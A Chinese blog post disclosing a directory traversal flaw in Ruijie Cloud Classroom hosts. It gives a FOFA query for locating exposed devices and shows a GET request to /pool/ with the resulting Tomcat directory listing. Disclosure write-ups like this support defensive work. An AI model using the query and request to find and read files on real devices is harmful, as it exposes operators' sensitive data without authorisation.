锐捷 云课堂主机 pool 目录遍历漏洞

漏洞描述

i ⭐锐捷云课堂主机存在目录遍历漏洞,通过访问get请求/pool/,即可读取目录.导致敏感信息泄露.

漏洞影响

s ✅锐捷云课堂

空间测绘

d ⭕FOFA:title="Ruijie" && "云课堂主机"

漏洞复现

  • ✅访问 http://1.1.1.1/pool目录遍历
1
2
3
4
5
6
7
8
Directory Listing For /

Filename Size Last Modified
Packages.gz 490.8 kb Fri, 26 May 2017 00:22:32 GMT
extra/ Fri, 26 May 2017 00:22:33 GMT
main/ Fri, 26 May 2017 00:22:33 GMT

Apache Tomcat/6.0.24

image-20220409082939453

个人博客

孤桜懶契:https://gylq.gitee.io/time

本文标题:锐捷 云课堂主机 pool 目录遍历漏洞

文章作者:孤桜懶契

发布时间:2022年04月09日 - 08:26:57

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/17.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------